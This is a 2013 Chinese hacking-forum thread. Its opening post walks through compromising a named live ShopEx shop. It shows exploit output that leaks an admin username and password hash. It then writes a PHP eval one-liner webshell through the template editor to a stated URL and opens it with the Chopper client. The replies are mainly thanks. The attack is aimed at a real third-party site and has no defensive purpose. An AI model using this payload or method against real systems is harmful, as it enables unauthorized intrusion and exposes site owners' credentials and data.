burp拿shopex_webshell 无聊掳过大牛勿喷

m0ox · 发表于 2013-11-24 05:56:24

本帖最后由 m0ox 于 2013-11-24 05:58 编辑

作者:弥心来自：www.ihonker.org

视频教程下载地址:

游客，如果您要查看本帖隐藏内容请回复

http://www.ccoo123.com/

http://www.ccoo123.com/shopadmin/index.php?ctl=passport&act=login

Send data to host www.ccoo123.com
Please wait, data is being received
Receive Data 17
Receive Data 9198
Receive Data 18103
Receive Data 21867
Receive Data 26661
Receive Data 30803
Exploit Success
username:adminczc
username:feb5cea0400a26926d2a587a6b8c0f0e

说下
join 加载
打开 burp
run  运行
show 列出所有的 exp

之前我解过了

步骤: 页面管理 - 模板列表- 编辑- 模板- 随便点击一个编辑- 保存下  -
图片

这边说明下
tmpid=在服务器生成的文件夹
name=文件名
file_source= 文件的内容

我们尝试写入一句话

先把burp 导入 repeater

<?php eval($_POST[1]);?>

http://www.ccoo123.com/themes/b2dgfc/1.php

go

我们用菜刀打开
图片
OK 成共了

其实还有方法就是上传模板  模板里面包含一句话木马文件  方法如上

下次在说谢谢观看

街\角の落叶 · 发表于 2013-11-24 10:00:27

？？？？很想知道隐藏了什么

显示全部楼层 · 发表于 2013-11-24 11:18:44

提示: 作者被禁止或删除内容自动屏蔽

秋叶下的烟头 · 发表于 2013-11-24 11:51:45

顶一个先

Lzzh · 发表于 2013-11-24 12:24:55

这个要看看啊。。。

陈可逆 · 发表于 2013-11-24 12:28:31

提示: 作者被禁止或删除内容自动屏蔽

显示全部楼层 · 发表于 2013-11-24 14:32:08

提示: 作者被禁止或删除内容自动屏蔽

蓝色_ · 发表于 2013-11-25 00:26:28

神器！

kiog_mr · 发表于 2013-11-27 10:30:56

谢谢分享

野驴~ · 发表于 2013-11-27 11:58:18

低调学习中~~~~~~~~~~

llsc 该用户已被删除	发表于 2013-11-24 11:18:44 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
llsc 该用户已被删除
	回复支持反对使用道具举报

陈可逆陈可逆当前离线积分 94 头像被屏蔽该用户从未签到	发表于 2013-11-24 12:28:31 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
陈可逆陈可逆当前离线积分 94 头像被屏蔽该用户从未签到
	回复支持反对使用道具举报

axiao 该用户已被删除	发表于 2013-11-24 14:32:08 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
axiao 该用户已被删除
	回复支持反对使用道具举报

burp拿shopex_webshell 无聊掳过大牛勿喷

指导单位

旗下站点

联系我们

burp拿shopex_webshell 无聊掳过 大牛勿喷

指导单位

旗下站点

联系我们

burp拿shopex_webshell 无聊掳过大牛勿喷